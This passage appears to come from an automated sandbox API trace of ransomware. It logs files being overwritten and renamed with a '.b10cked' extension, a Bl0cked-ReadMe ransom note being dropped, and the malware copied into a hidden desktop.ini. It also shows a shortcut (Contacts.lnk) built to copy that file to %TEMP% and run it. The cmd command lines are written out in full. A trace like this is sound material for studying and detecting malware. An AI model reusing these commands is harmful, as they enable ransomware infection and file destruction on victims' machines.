lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x10b1e [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x10b1e [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0208.399] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x858e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x858e, lpOverlapped=0x0) returned 1 [0208.516] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0208.516] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x858e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x858e, lpOverlapped=0x0) returned 1 [0208.516] SetFilePointer (in: hFile=0x120, lDistanceToMove=-34190, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8590 [0208.516] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x858e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x858e, lpOverlapped=0x0) returned 1 [0208.517] SetFilePointer (in: hFile=0x120, lDistanceToMove=-34190, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8590 [0208.517] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x858e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x858e, lpOverlapped=0x0) returned 1 [0208.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 
lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Administrator.contact", lpUsedDefaultChar=0x0) returned 21 [0208.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x10b1e [0208.539] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0208.539] CloseHandle (hObject=0x120) returned 1 [0208.540] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Contacts\\Administrator.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Contacts\\ADMINI~1.CON") returned 0x26 [0208.541] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Contacts\\") returned 0x1a [0208.541] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, 
hThread=0x120, dwProcessId=0xe54, dwThreadId=0xc4)) returned 1 [0208.543] CloseHandle (hObject=0x1b4) returned 1 [0208.543] CloseHandle (hObject=0x120) returned 1 [0208.543] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\CONTACTS\\") returned 0x1a [0208.543] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\") returned 0x48 [0208.543] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\", cchCount2=72) returned 3 [0208.543] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\CONTACTS\\") returned 0x1a [0208.544] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0208.544] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0208.544] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0208.544] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0208.544] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0208.544] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Contacts\\") returned 0x1a [0208.544] CharUpperBuffW (in: lpsz="type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0208.544] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0208.544] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x234, dwThreadId=0x42c)) returned 1 [0208.550] CloseHandle (hObject=0x1b4) returned 1 [0208.550] CloseHandle (hObject=0x120) returned 1 [0208.550] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\contacts\\bl0cked-readme.rtf")) returned 0xffffffff [0208.550] GetLastError () returned 0x2 [0208.550] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\contacts\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0208.552] GetFileAttributesW 
(lpFileName="C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\contacts\\bl0cked-readme.rtf")) returned 0x20 [0208.552] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0208.552] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0208.553] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0208.553] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0208.553] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0208.553] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0208.553] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0208.553] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Contacts\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Contacts\\") returned 0x1a [0208.553] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && 
ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0208.553] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0208.553] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Contacts", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Contacts") returned 0x19 [0208.553] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x122 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\DEFAULT\\CONTACTS\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\DEFAULT\\CONTACTS\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\DEFAULT\\CONTACTS\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\DEFAULT\\CONTACTS\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x122 [0208.553] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0208.553] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, 
hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x140, dwThreadId=0x84c)) returned 1 [0208.559] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0210.129] CloseHandle (hObject=0x120) returned 1 [0210.129] CloseHandle (hObject=0x1b4) returned 1 [0210.129] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0210.129] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0210.129] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0210.129] GetTickCount () returned 0x3b02b [0210.129] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=26691864808) returned 1 [0210.129] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x66\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.129] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x50\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x67\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x49\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0210.130] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0210.130] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0210.130] CharUpperBuffW (in: lpsz="explorer.exe \"Contacts\" & type \"Contacts\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && 
\"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"CONTACTS\" & TYPE \"CONTACTS\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0210.130] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0210.130] CharUpperBuffW (in: lpsz="explorer.exe \"Contacts\" & type \"Contacts\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"CONTACTS\" & TYPE \"CONTACTS\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0210.130] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0210.130] CoInitialize (pvReserved=0x0) returned 0x0 [0210.130] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0210.131] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0210.131] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0210.131] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0210.133] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Contacts\" & type \"Contacts\\desktop.ini\" > \"%TEMP%\\fPs8gIz6.exe\" && \"%TEMP%\\fPs8gIz6.exe\"") returned 0x0 [0210.133] 
ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0210.133] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0210.133] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0210.133] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\Default\\Contacts.lnk", fRemember=0) returned 0x0 [0210.140] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0210.140] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0210.140] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0210.140] CoUninitialize () [0210.140] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0210.140] ReleaseMutex (hMutex=0xf8) returned 1 [0210.140] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0210.140] ReleaseMutex (hMutex=0xf8) returned 1 [0210.140] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0210.141] ReleaseMutex (hMutex=0xf8) returned 1 [0210.141] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0210.141] ReleaseMutex (hMutex=0xf8) returned 1 [0210.141] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0210.352] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.352] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=26714185324) returned 1 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xe2 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, 